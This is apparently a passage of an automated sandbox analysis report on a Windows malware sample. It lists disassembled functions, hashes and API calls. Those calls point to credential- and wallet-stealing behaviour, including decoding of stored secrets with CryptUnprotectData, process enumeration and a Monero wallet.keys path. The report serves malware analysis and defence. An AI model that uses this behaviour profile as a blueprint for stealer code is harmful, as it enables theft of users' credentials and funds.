                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 11y-$7*O{$Qz-$b[n$k Rk$1Y:$><
                        • API String ID: 0-350295712
                        • Opcode ID: a583dd45a5b847c5af47c94b5b36afa5a9644823866337c44f6d87ea7b764fb8
                        • Instruction ID: 5fcc5e95ed41aeede73b049506ca1655f76ed022ccea9c4f79044f7ffe8a82cc
                        • Opcode Fuzzy Hash: a583dd45a5b847c5af47c94b5b36afa5a9644823866337c44f6d87ea7b764fb8
                        • Instruction Fuzzy Hash: 40B219F360C214AFE3046E29EC8567AF7E9EF94720F1A493DEAC4D3744EA3558018697
                        Function 0086E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00880D73), ref: 0086E4A2
                        • StrCmpCA.SHLWAPI(?,008814F8), ref: 0086E4F2
                        • StrCmpCA.SHLWAPI(?,008814FC), ref: 0086E508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0086EBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: 73674e41a997595397e2bd92c1ac95b1b6bf30508561a68d8a165bf932cccdf5
                        • Instruction ID: 41072a560dcf0e100233885948cfc2939fd5190b344bcc255897bff3cf5d7e47
                        • Opcode Fuzzy Hash: 73674e41a997595397e2bd92c1ac95b1b6bf30508561a68d8a165bf932cccdf5
                        • Instruction Fuzzy Hash: 801220719101149ADB1CFB68DC96EEE7378FB94300F4081A8A52ED6195EF349F49CB93
                        Function 00C2E06E Relevance: 9.2, Strings: 6, Instructions: 1653COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: K%]$QYv{$R'3$_W^t$aw$cZ<
                        • API String ID: 0-4190752915
                        • Opcode ID: 44659b7301c60ecddf48f4e6df65a720049d785483f3af690fde2e8a5252380b
                        • Instruction ID: 297c362cd4ecab06ac93767d8a56d8dc58ab48194db1b50469bcd4f6b1c2bb12
                        • Opcode Fuzzy Hash: 44659b7301c60ecddf48f4e6df65a720049d785483f3af690fde2e8a5252380b
                        • Instruction Fuzzy Hash: DFB2E6F360C2049FE304AE2DEC4567ABBE9EFD4620F1A453DEAC4C3744EA3598458697
                        Function 0086C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0086C871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0086C87C
                        • lstrcat.KERNEL32(?,00880B46), ref: 0086C943
                        • lstrcat.KERNEL32(?,00880B47), ref: 0086C957
                        • lstrcat.KERNEL32(?,00880B4E), ref: 0086C978
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: ab6d47346b3200df05926286e93ee70ac55b5255996dc00d14a2e08a28de4ceb
                        • Instruction ID: f3a859fa1d9836835a67c8f978c1ddb3a8e7a981eac9deb16d973a3d0c996447
                        • Opcode Fuzzy Hash: ab6d47346b3200df05926286e93ee70ac55b5255996dc00d14a2e08a28de4ceb
                        • Instruction Fuzzy Hash: 5D416DB590421ADBDB10DFA4DD89BFEBBB8FB48304F1041A8E509A72C0D7745A85CF91
                        Function 00867240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0086724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00867254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00867281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 008672A4
                        • LocalFree.KERNEL32(?), ref: 008672AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: d38bddb4c45b5fcf04ee08d6abcc7e071f98bddfcd24cc7e70c96ee7be33bf19
                        • Instruction ID: 664ca4cd8ed6e224aa8aae4c19457ca50d7acfeb627f5ceaf811563a98242a4f
                        • Opcode Fuzzy Hash: d38bddb4c45b5fcf04ee08d6abcc7e071f98bddfcd24cc7e70c96ee7be33bf19
                        • Instruction Fuzzy Hash: AD01EDB5A40209BBDB50DFD4CD45F9E77B8EB48B04F104154FB05EA2C0D774AA01CBA5
                        Function 00879600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0087961E
                        • Process32First.KERNEL32(00880ACA,00000128), ref: 00879632
                        • Process32Next.KERNEL32(00880ACA,00000128), ref: 00879647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 0087965C
                        • CloseHandle.KERNEL32(00880ACA), ref: 0087967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: 184770efd06b2032b92b9b19264be18f7f94fb0910d1c3926e48d933da0c35b3
                        • Instruction ID: 64e312b757c83553b34a472c577e0f3ddc69cc8eea6696e2f0be689ae8700d9c
                        • Opcode Fuzzy Hash: 184770efd06b2032b92b9b19264be18f7f94fb0910d1c3926e48d933da0c35b3
                        • Instruction Fuzzy Hash: 5F01E9B5A00209ABCB15DFA5C948BEEB7F8FB58300F108288E94AD7280D7349A45CF51
                        Function 00C34B12 Relevance: 6.6, Strings: 4, Instructions: 1610COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Wuvs$st^$~~_$L/v
                        • API String ID: 0-798858268
                        • Opcode ID: bf97176a308fd7ed4e9170a56a09b632410113d38fbb5d77958919c721573da2
                        • Instruction ID: 56dd831464fde9281616533545f9c3f2d718058092949faf8925260fbfef9daa
                        • Opcode Fuzzy Hash: bf97176a308fd7ed4e9170a56a09b632410113d38fbb5d77958919c721573da2
                        • Instruction Fuzzy Hash: 38B2F6F3A0C204AFE304AE2DEC8577AF7E9EF94620F1A453DEAC4C3744E63558058696
                        Function 00C316C8 Relevance: 6.6, Strings: 4, Instructions: 1606COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !|sq$BumY$H9r$uvw^
                        • API String ID: 0-2612479984
                        • Opcode ID: cd588d96752fe09d249f2d7080701e24dbad68b075b522130372753a0a73efd9
                        • Instruction ID: 1101aa82ab8b44bfa2af3f4d79aa6e49e4dbfd860e352af2380e836e5450aacd
                        • Opcode Fuzzy Hash: cd588d96752fe09d249f2d7080701e24dbad68b075b522130372753a0a73efd9
                        • Instruction Fuzzy Hash: 29B2F5F360C204AFE704AE29EC8567AFBE9EF94720F16493DE6C4C3744E63558418697
                        Function 00C27412 Relevance: 6.6, Strings: 4, Instructions: 1589COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !s~+$*@?$u7?$&u
                        • API String ID: 0-1056303262
                        • Opcode ID: 9649fd8e0379e8eb9f947764f8547678bcfc8022ccdd97823d7541dbd22ae4b5
                        • Instruction ID: 0695a2b2ad6eb5ec83254d21a1b6151da27ae4fe82e64b8fd41a553c13e1c912
                        • Opcode Fuzzy Hash: 9649fd8e0379e8eb9f947764f8547678bcfc8022ccdd97823d7541dbd22ae4b5
                        • Instruction Fuzzy Hash: ECA23AF3A0C204AFE7046E2DEC8567AFBE9EF94360F16493DEAC5C3344E93558058696
                        Function 00C3B401 Relevance: 6.5, Strings: 4, Instructions: 1529COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ++}v$2eo$K}?M$L^
                        • API String ID: 0-2310634233
                        • Opcode ID: df6d283c138aabc6acbc3eafa9e1356c80b2c040f2ee7d4cc698e2d1ef63bf77
                        • Instruction ID: e98c0e56dc6bc1241e2099f32d1e67e7f3a26ba73988a62a0bb21f7d17049e5f
                        • Opcode Fuzzy Hash: df6d283c138aabc6acbc3eafa9e1356c80b2c040f2ee7d4cc698e2d1ef63bf77
                        • Instruction Fuzzy Hash: C6B2C2F260C2009FE708AE29EC8567AFBE5EF94720F16493DEAC5C3744EA3558418797
                        Function 00C29193 Relevance: 6.4, Strings: 4, Instructions: 1400COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ;5C?$SA$[(tv$B;
                        • API String ID: 0-1544452065
                        • Opcode ID: 826246aee8b69dc1a54452a29b4d4b8f512216323a21d375aba59639a4d93280
                        • Instruction ID: 301d491a205dc196df85af2c18ee2dd7110ec46bd4bd3ecb26809d92cf20d7f9
                        • Opcode Fuzzy Hash: 826246aee8b69dc1a54452a29b4d4b8f512216323a21d375aba59639a4d93280
                        • Instruction Fuzzy Hash: 30923AF360C2009FE705AE29DC8567AB7E5EF94320F1A853DEAC5C3744EA3598058697
                        Function 00878680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008805B7), ref: 008786CA
                        • Process32First.KERNEL32(?,00000128), ref: 008786DE
                        • Process32Next.KERNEL32(?,00000128), ref: 008786F3
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
